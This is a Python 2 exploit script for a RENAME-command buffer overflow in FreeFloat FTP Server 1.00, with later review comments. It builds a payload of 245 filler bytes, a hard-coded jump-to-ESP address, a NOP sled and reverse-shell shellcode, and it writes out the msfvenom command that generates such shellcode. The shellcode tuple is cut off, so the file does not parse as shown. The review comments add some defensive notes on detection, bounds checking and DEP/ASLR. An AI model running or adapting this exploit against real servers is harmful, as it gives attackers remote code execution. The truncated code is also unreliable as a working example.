#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title:FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
# Date: 29/10/2016
# Exploit Author: Eagleblack
# Software Link:http://www.freefloat.com/software/freefloatftpserver.zip
# Version:1.00
# Tested on: Windows XP Professional SP3 Spanish version x86
# CVE : N/A
#Description: FreeFloat FTP server allows login as root without a user name or password. This vulnerability allows an attacker to log in and send a
# long chain of characters that overflows the buffer; when the attacker knows the exact offset at which the EIP register is overwritten,
# he can take control of the application and send malicious code (payload) via the ESP stack pointer, which allows obtaining
# remote code execution on the system that is running the FTP server, in this case Windows XP.
import socket
# Hard-coded return address: the header states this ADVAPI32.dll address holds
# a jump to ESP on the tested Windows XP SP3 (Spanish) build. It is build- and
# language-specific and only works if the module loads at a fixed base; DEP and
# ASLR on the host defeat exactly this technique.
ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll: this DLL has a jump to ESP (stack pointer) at this address
#Metasploit shellcode:
#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
# NOTE(review): the shellcode tuple below is truncated in this copy -- the
# opening parenthesis is never closed, so the file does not parse as-is.
# The bytes excluded via -b (\x00, \x0a, \x0d) are NUL and CR/LF; CR/LF is the
# command terminator this script itself appends to every FTP command.
shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
# Payload layout: 245 bytes of filler up to the saved return address, the
# 4-byte overwrite, a 30-byte NOP sled, then the shellcode (279 bytes before
# the shellcode even begins). The 245 offset is specific to the tested build.
# Defensively, a RENAME argument of this size beginning with a long run of
# 'A' bytes is a straightforward log/IDS indicator; the actual remediation is
# bounds checking of the command argument on the server side.
buffer ='\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245
print "Sending Buffer"  # Python 2 print statement: this script is Python 2 only
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
# Target host is left blank here; 21 is the FTP control port.
# socket.connect() returns None, so the `connect` name carries no useful value.
connect = s.connect(('',21))#IP address and port (21) from the target
# Empty USER/PASS: per the header, the server accepts a login without
# credentials. No recv() is ever issued, so the script never checks the
# server's replies to the login or to the RENAME command.
s.send('USER \r\n') #Sending USER (Null user)
s.send('PASS \r\n') #Sending Password (Null password)
# No space between 'RENAME' and the argument; the socket is never closed.
s.send('RENAME' + buffer +'\r\n')